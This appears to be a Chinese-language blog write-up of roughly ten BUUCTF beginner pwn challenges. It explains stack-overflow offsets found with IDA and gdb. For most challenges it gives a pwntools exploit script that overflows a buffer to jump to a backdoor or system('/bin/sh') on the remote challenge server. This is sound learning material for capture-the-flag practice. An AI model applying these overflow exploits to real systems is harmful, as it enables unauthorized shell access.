才知道，由于栈对齐，直接动调看栈估计会错，用cyclic看

1.test_your_nc

NC连接一下，这个网站似乎直接访问是不中的，怀疑是没开启web的端口。NC链接输入cat flag就OK了，应该只是让我这样的小菜鸟培养自信用的。

2.rip

checksec后发现可以进行栈溢出操作。运行一下看看。直接就是让输入东西。进IDA看看。

果然有后门函数。显然是ret2text类型，直接进行溢出即可。分析栈结构易知首先要溢出15+8个字节才可以到rip地方。

这是动调结果。看到-008那个地方村的实际上是字符串的结尾应该。看出其中距离80-70=16.但是实际上不应该是s占15吗，我也是百思不得其解。回想起课程来看，应该是GDB本身的地址可能有时候有误差，还是要结合IDA来看。

由于不擅长动调拿地址，这里就不献丑了，再学习学习吧。看IDA是可以直接看出溢出的。

exp：

这里需要考虑站平衡，看有的人说是BUUCTF虚拟机的规定。我现在简单的理解就是不破坏栈帧结构，即不要执行push之类的操作改变栈帧。

from pwn import *p=remote('node5.buuoj.cn',27494)payload=b'A'*(23)+p64(0x0401186)p.sendline(payload)p.interactive()

 3.warmup_csaw_2016

可以进行栈溢出，而且还是栈可执行！

看到后门函数，而且main函数执行完毕自动执行gets函数。现在就很明确了。

这次挑战用动调拿到偏移量。看到0x61是我们输入的a的ASCII码，结合rax常用来储存这类信息，很明确最后的gets函数输入的内容就在这里了。那么我们就可以进行栈溢出，偏移量首先＋64+8，最后溢出地址考虑一下站平衡即可。

exp：

from pwn import *p=remote('node5.buuoj.cn',27676)payload=b'A'*(64+8)+p64(0x00400611)p.sendline(payload)p.interactive()

4.ciscn_2019_n_1

看到了别人的博客，决定先解决这一道题。由于对动调还不熟练，所以我在IDA里面看了栈结构，同时注意到没有开启任何保护，发现可以进行栈溢出，应该是修改指定变量值为要求的即可。这里要注意一点，也是我出错的地方，float类型不可以直接跟字符串，需要转为16进制后用p64这个函数进行解决。

以下是常规思路（sendline会发送一个回车，表示输出结束）

from pwn import *
p=remote('node5.buuoj.cn',26700)
payload=b'A'*0x2c+p64(0x41348000)
p.sendline(payload)
p.interactive()

还有一种方法，覆盖EIP的值，直接跳转到bin/sh，看看可以不。看图，我们需要溢出到r，显然需要将s也覆盖了。看灰色地址，8是r的开始，所以我们要覆盖上面的0x30和下面的8.返回地址恰好就是给system函数给参数的，见图二

exp：

from pwn import *
p=remote('node5.buuoj.cn',26700)
payload=b'A'*56+p64(0x04006BE)
p.sendline(payload)
p.interactive()

5.pwn1_sctf_2016 

还是先检查保护发现可以栈溢出。

调用了这一坨函数，看着很差劲。 让豆包逐行解释吧。最后也是勉强看懂一点点，这个里面的代码豆包说也不符合规范什么的，勉强着看吧。

std::allocator 是 C++ 标准库中的一个模板类，定义在 <memory> 头文件中，主要用于为容器（如 std::vector、std::list 等）或其他需要动态内存分配的对象管理内存的分配和释放。

这题也有后门函数，显然是用栈溢出了，关键就是看fgets这个函数。我们IDA看栈帧，大胆推测只要一直往下溢出就行，看空间一共是0x3c，然后传入返回地址。看样子这样做没问题，试试吧。

从运行结果看，edata确实是缓冲区，但是估计地址计算出错，动调看看即可。

rax这里存的是字符串。看样子字符串距离ebp60，ebp自己是4，我们再次修改脚本运行看。还是错误的。估计还是拿错地址了，我们继续动调一次。这次让他多运行几行代码。 

看样子变化还是不多大，仔细想一想，难道是地址找错了。 看一下其他人的WP吧。

从题海中入门（五）pwn1_sctf_2016 - FreeBuf网络安全行业门户

(buuctf) - pwn入门部分wp - rip -- pwn1_sctf_2016 - J1ay - 博客园

其实，replace函数实现了将I替换为you，这里可以后期动调得到。实际上，fgets函数已经限制了读取的字节数，这可不像gets函数那样危险！

接下来，我们开始编写脚本。一个I会换成3个字节，60个字节除以3，就是20，也就是0x14！对于函数，还是看不太透彻，还需要多多练习。

exp：

from pwn import *p=remote('node5.buuoj.cn',29365)payload=b'I'*(0x14)+b'AAAA'+p32(0x08048F13)p.sendline(payload)p.interactive()

6.jarvisoj_level0 

咋一看感觉很简单呀，这脆弱函数比上面的第五题容易多了。

exp：

from pwn import *p=remote('node5.buuoj.cn',29231)payload=b'I'*(128+8)+p64(0x040059A)p.sendline(payload)p.interactive()

7.[第五空间2019 决赛]PWN5

首先分析main函数。

注意看，解锁/bin/sh必须保证4字节的数是对上号的。但是这四字节的数字我们并不知道，也不可能在人家服务器上动调获得，那怎么办嘛？

参考c929_bt大佬的博客（BUU：[第五空间2019 决赛]PWN5_buuctf 第五空间2019 pwn5-CSDN博客发现，原来可以利用栈溢出覆盖这串数字。这样就可以为我们所操控了。

恰好看栈结构，nptr在buf上面，所以我们溢出后也不影响nptr的输入，真是美滋滋。推测4字节的Var_c是校验值。整体思路是首先填充0x70-0xd个垃圾数据给buf，然后填充4个有效字符给校验值，最后输入对应的校验值就可以了。现在开始写脚本

首次尝试发现不对，那说明我们的思路错误了。可能那个地方不是校验值。

实际上有栈保护，无法溢出。

其实这里要用格式化字符串漏洞，详见c929_bt大佬的博客BUU：[第五空间2019 决赛]PWN5_buuctf 第五空间2019 pwn5-CSDN博客  

8. jarvisoj_level2

估计也可以栈溢出，进去看看。

这道题有意思，只给了system函数，参数却不是/bin/sh，所以我们应该需要使用函数参数入栈的知识。ROPgadget我这边扫不出来东西，那估计不是ROP。想想咋给/bin/sh入栈。。。

没思路了，求救WP。以及参考了hello-ctf。发现其实32位ROP不需要pop链条。

BUUCTF—jarvisoj_level2 - 予柒 - 博客园

WP：在我的攻防世界BLOG里面有原题。

from pwn import *
p=remote('node5.buuoj.cn',28501)
sys=0x8048320
binsh=0x804A024
payload=b'a'*(0x88+0x4)+p32(sys)+b'aaaa'+p32(binsh)
p.sendline(payload)
p.interactive()

9.ciscn_2019_n_8 

思路同第四题。

from pwn import *
p=remote('node5.buuoj.cn',29557)
payload=b'A'*13*4+p64(0x11)
p.sendline(payload)
p.interactive()

10.bjdctf_2020_babystack

看样子是栈溢出。 分析下列代码可知，read会读取我们输入的指定字节的数据，这点就是突破，而程序已经有一个backdoor函数，只需要ret2text即可。发现IDA给的偏移量有一点问题，还是动调。

exp：

from pwn import *
p=remote('node5.buuoj.cn',28997)
addr=0x4006EA
payload=b'a'*24+p64(addr)
p.sendline('100')
p.sendline(payload)
p.interactive()